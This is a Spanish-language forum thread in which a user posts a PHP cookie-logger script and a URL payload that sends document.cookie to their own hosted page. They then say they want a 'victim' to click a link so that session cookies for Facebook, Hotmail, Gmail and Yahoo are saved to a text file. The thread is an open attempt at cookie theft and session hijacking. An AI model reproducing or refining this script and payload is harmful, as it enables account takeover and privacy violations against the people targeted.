Saltar al contenido
sin sombra

codigo php para extraer cookies

Mensajes recomendados

Publicado

hola, necesito ayuda, hice esta pagina

www.nuestronidodeamor.300mb.es/cookies.php?cookie='+document.cookie;

que tiene este codigo

<?

$cookie = $_GET['cookie'];

$fff = fopen("archivo.txt","a");

fwrite($fff, "$cookie \n");

fclose($fff);

?>

el tema que el archivo me grabar el texto

\' document.cookie;

estoy mal en algo?

<b>BLABLABLA</b>

Publicado

como generas la cookie??, se supone q estas tomando el valor del archivo cookie y guardandolo en archivo.txt, por lo general yo grabo y rescato de datos generados a partir de cookies autocreadas en sesiones de usuarios, pero en realidad no se q estas haciendo tu. podrias explicarte mejor.

Publicado
como generas la cookie??, se supone q estas tomando el valor del archivo cookie y guardandolo en archivo.txt, por lo general yo grabo y rescato de datos generados a partir de cookies autocreadas en sesiones de usuarios, pero en realidad no se q estas haciendo tu. podrias explicarte mejor.

resulta que vi ese ejemplo en la web y esta super repetido, y no entiendo que hace, yo juraba que escribia en el archivo de texto todas las cuentas de diferentes sesiones con sus contraseñas... el tema es que quiero que mi victima pinche un link y automaticamente el link guarde en un archivo de texto todas las sesiones que se ejecutaron en internet, sea face, hotmail, gmail, yahoo, etc... con esto no es necesario ir a los pc a buscar las cookies y hacer el trabajo que tu mencionas

<b>BLABLABLA</b>

• Visualizado recientemente   0 usuarios

• No hay usuarios registrado para ver esta página.
  • Crear nuevo...